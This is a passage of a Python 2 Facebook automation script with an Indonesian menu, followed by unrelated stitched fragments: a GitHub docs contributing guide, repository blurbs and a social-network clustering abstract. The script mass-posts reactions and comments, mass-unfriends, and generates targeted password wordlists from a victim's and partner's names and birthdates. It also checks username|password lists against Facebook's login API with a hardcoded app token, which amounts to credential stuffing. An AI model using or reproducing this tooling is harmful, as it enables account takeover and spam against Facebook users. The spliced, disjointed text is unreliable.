raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') try: oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksi.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksi)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_react(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print reactg_pilih() def reactg_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' reactg_pilih() else: if aksi == '1': tipe = 'LIKE' reactg() else: if aksi == '2': tipe = 'LOVE' reactg() else: if aksi == '3': tipe = 'WOW' reactg() else: if aksi == '4': tipe = 'HAHA' reactg() else: if aksi == '5': tipe = 'SAD' reactg() else: if aksi == '6': tipe = 'ANGRY' reactg() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' reactg_pilih() def reactg(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] try: oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) ah = json.loads(oh.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for a in ah['feed']['data']: y = a['id'] reaksigrup.append(y) requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(reaksigrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def bot_komen(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komen.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komen)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def grup_komen(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru" ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') km = raw_input('\x1b[1;91m[+] \x1b[1;92mKomentar \x1b[1;91m:\x1b[1;97m ') limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') km = km.replace('<>', '\n') try: ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket) asw = json.loads(ah.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket) a = json.loads(p.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for s in a['feed']['data']: f = s['id'] komengrup.append(f) requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket) print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]' print print '\r\x1b[1;91m[+]\x1b[1;97m Selesai \x1b[1;96m' + str(len(komengrup)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() except KeyError: print '\x1b[1;91m[!] ID Tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def deletepost(): os.system('reset') try: toket = open('login.txt', 'r').read() nam = requests.get('https://graph.facebook.com/me?access_token=' + toket) lol = json.loads(nam.text) nama = lol['name'] except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama jalan('\x1b[1;91m[+] \x1b[1;92mMulai menghapus postingan unfaedah\x1b[1;97m ...') print 40 * '\x1b[1;97m\xe2\x95\x90' asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket) asus = json.loads(asu.text) for p in asus['data']: id = p['id'] piro = 0 url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket) ok = json.loads(url.text) try: error = ok['error']['message'] print '\x1b[1;91m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;91m] \x1b[1;95mGagal' except TypeError: print '\x1b[1;92m[\x1b[1;97m' + id[:10].replace('\n', ' ') + '...' + '\x1b[1;92m] \x1b[1;96mTerhapus' piro += 1 except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def accept(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ') r = requests.get('https://graph.facebook.com/me/friendrequests?limit=' + limit + '&access_token=' + toket) teman = json.loads(r.text) if '[]' in str(teman['data']): print '\x1b[1;91m[!] Tidak ada permintaan pertemanan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in teman['data']: gas = requests.post('https://graph.facebook.com/me/friends/' + i['from']['id'] + '?access_token=' + toket) a = json.loads(gas.text) if 'error' in str(a): print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;91m Gagal' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[+] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + i['from']['name'] print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + i['from']['id'] + '\x1b[1;92m Berhasil' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def unfriend(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;97mStop \x1b[1;91mCTRL+C' print try: pek = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) cok = json.loads(pek.text) for i in cok['data']: nama = i['name'] id = i['id'] requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mTerhapus\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_bot() def lain(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Buat postingan' print '\x1b[1;37;40m2. Buat Wordlist' print '\x1b[1;37;40m3. Akun Checker' print '\x1b[1;37;40m4. Lihat daftar grup' print '\x1b[1;37;40m5. Profile Guard' print print '\x1b[1;97m ->Coming soon<-' print print '\x1b[1;31;40m0. Kembali' print pilih_lain() def pilih_lain(): other = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Jangan kosong' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mTidak ada' pilih_lain() def status(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mKetik status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] Jangan kosong' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def wordlist(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 40 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mNama Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97m %s.txt' % a raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] Gagal membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def check_akun(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 40 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mPemisah \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif 'www.facebook.com' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mMati\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def grupsaya(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 40 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() def guard(): global toket os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Aktifkan' print '\x1b[1;37;40m2. NonAktifkan' print '\x1b[1;31;40m0. Kembali' print g = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if g == '1': aktif = 'true' gaz(toket, aktif) else: if g == '2': non = 'false' gaz(toket, non) else: if g == '0': lain() else: if g == '': keluar() else: keluar() def get_userid(toket): url = 'https://graph.facebook.com/me?access_token=%s' % toket res = requests.get(url) uid = json.loads(res.text) return uid['id'] def gaz(toket, enable=True): id = get_userid(toket) data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id)) headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket} url = 'https://graph.facebook.com/graphql' res = requests.post(url, data=data, headers=headers) print res.text if '"is_shielded":true' in res.text: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDiaktifkan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: if '"is_shielded":false' in res.text: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDinonaktifkan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') lain() else: print '\x1b[1;91m[!] Error' keluar() if __name__ == '__main__': login()
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# Contributing to this repository <!-- omit in toc --> ## Getting started <!-- omit in toc --> Before you begin: - This site is powered by Node.js. Check to see if you're on the [version of node we support](contributing/development.md). - Have you read the [code of conduct](CODE_OF_CONDUCT.md)? - Check out the [existing issues](https://github.com/github/docs/issues) & see if we [accept contributions](#types-of-contributions-memo) for your type of issue. ### Use the 'make a contribution' button  Navigating a new codebase can be challenging, so we're making that a little easier. As you're using docs.github.com, you may come across an article that you want to make an update to. You can click on the **make a contribution** button right on that article, which will take you to the file in this repo where you'll make your changes. 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rtimush
ZioMagicComments is a Scalafix rule that adds explanatory graphs as comments to zio-magic methods
EMETEM-GLOBAL-ENTERPRISE
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For anything else, see [the CONTRIBUTING guide in the site-policy repo](https://github.com/github/site-policy/blob/main/CONTRIBUTING.md). ## Starting with an issue You can browse existing issues to find something that needs help! ### Labels Labels can help you find an issue you'd like to help with. - The [`help wanted` label](https://github.com/github/docs/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22) is for problems or updates that anyone in the community can start working on. - The [`good first issue` label](https://github.com/github/docs/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) is for problems or updates we think are ideal for beginners. - The [`content` label](https://github.com/github/docs/issues?q=is%3Aopen+is%3Aissue+label%3Acontent) is for problems or updates in the content on docs.github.com. These will usually require some knowledge of Markdown. - The [`engineering` label](https://github.com/github/docs/issues?q=is%3Aopen+is%3Aissue+label%3Aengineering) is for problems or updates in the docs.github.com website. These will usually require some knowledge of JavaScript/Node.js or YAML to fix. ## Opening a pull request You can use the GitHub user interface :pencil2: for some small changes, like fixing a typo or updating a readme. You can also fork the repo and then clone it locally, to view changes and run your tests on your machine. ## Working in the github/docs repository Here's some information that might be helpful while working on a Docs PR: - [Development](/contributing/development.md) - This short guide describes how to get this app running on your local machine. - [Content markup reference](/contributing/content-markup-reference.md) - All of our content is written in GitHub-flavored Markdown, with some additional enhancements. - [Content style guide for GitHub Docs](/contributing/content-style-guide.md) - This guide covers GitHub-specific information about how we style our content and images. It also links to the resources we use for general style guidelines. - [Reusables](/data/reusables/README.md) - We use reusables to help us keep content up to date. Instead of writing the same long string of information in several articles, we create a reusable, then call it from the individual articles. - [Variables](/data/variables/README.md) - We use variables the same way we use reusables. Variables are for short strings of reusable text. - [Liquid](/contributing/liquid-helpers.md) - We use liquid helpers to create different versions of our content. - [Scripts](/script/README.md) - The scripts directory is the home for all of the scripts you can run locally. - [Tests](/tests/README.md) - We use tests to ensure content will render correctly on the site. Tests run automatically in your PR, and sometimes it's also helpful to run them locally. ## Reviewing We (usually the docs team, but sometimes GitHub product managers, engineers, or supportocats too!) review every single PR. The purpose of reviews is to create the best content we can for people who use GitHub. :yellow_heart: Reviews are always respectful, acknowledging that everyone did the best possible job with the knowledge they had at the time. :yellow_heart: Reviews discuss content, not the person who created it. :yellow_heart: Reviews are constructive and start conversation around feedback. ### Self review You should always review your own PR first. For content changes, make sure that you: - [ ] Confirm that the changes address every part of the content strategy plan from your issue (if there are differences, explain them). - [ ] Review the content for technical accuracy. - [ ] Review the entire pull request using the [localization checklist](contributing/localization-checklist.md). - [ ] Copy-edit the changes for grammar, spelling, and adherence to the style guide. - [ ] Check new or updated Liquid statements to confirm that versioning is correct. - [ ] Check that all of your changes render correctly in staging. Remember, that lists and tables can be tricky. - [ ] If there are any failing checks in your PR, troubleshoot them until they're all passing. ### Pull request template When you open a pull request, you must fill out the "Ready for review" template before we can review your PR. This template helps reviewers understand your changes and the purpose of your pull request. ### Suggested changes We may ask for changes to be made before a PR can be merged, either using [suggested changes](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/incorporating-feedback-in-your-pull-request) or pull request comments. You can apply suggested changes directly through the UI. You can make any other changes in your fork, then commit them to your branch. As you update your PR and apply changes, mark each conversation as [resolved](https://docs.github.com/en/github/collaborating-with-issues-and-pull-requests/commenting-on-a-pull-request#resolving-conversations). ## Windows This site can be developed on Windows, however a few potential gotchas need to be kept in mind: 1. Regular Expressions: Windows uses `\r\n` for line endings, while Unix based systems use `\n`. Therefore when working on Regular Expressions, use `\r?\n` instead of `\n` in order to support both environments. The Node.js [`os.EOL`](https://nodejs.org/api/os.html#os_os_eol) property can be used to get an OS-specific end-of-line marker. 1. Paths: Windows systems use `\` for the path separator, which would be returned by `path.join` and others. You could use `path.posix`, `path.posix.join` etc and the [slash](https://ghub.io/slash) module, if you need forward slashes - like for constructing URLs - or ensure your code works with either. 1. Bash: Not every Windows developer has a terminal that fully supports Bash, so it's generally preferred to write [scripts](/script) in JavaScript instead of Bash.
mrandri19
Read 4chan, Hacker News and reddit comments using a graph visualization.
The identification of peers in a social network has been analyzed over giving importance to recognition in the way of connection and interaction between people. The coterie identification can be done by the structure of Facebook public pages. There are a lot of activities people perform which are diverse from each other. Since the different activities can’t be identified, we choose newsgroup pages and focus on extraction of one set of users. For this, we use Label Propagation Algorithm, Fast Unfolding and Spectral Clustering methods for identification and compare the results of each method to get a fair understanding of which method calculates the no.of user nodes effectively. These algorithms base the results upon the posts, likes and comments for each user activity. In order to get the effective values as outputs we eliminate the isolated and enhance the quality of the peer network across multiple pages with the use of subgraphs containing nodes that are more densely linked to each other than to the remaining nodes of the graph. The peer identification problem is tackled by the above mentioned algorithms.
yukubo
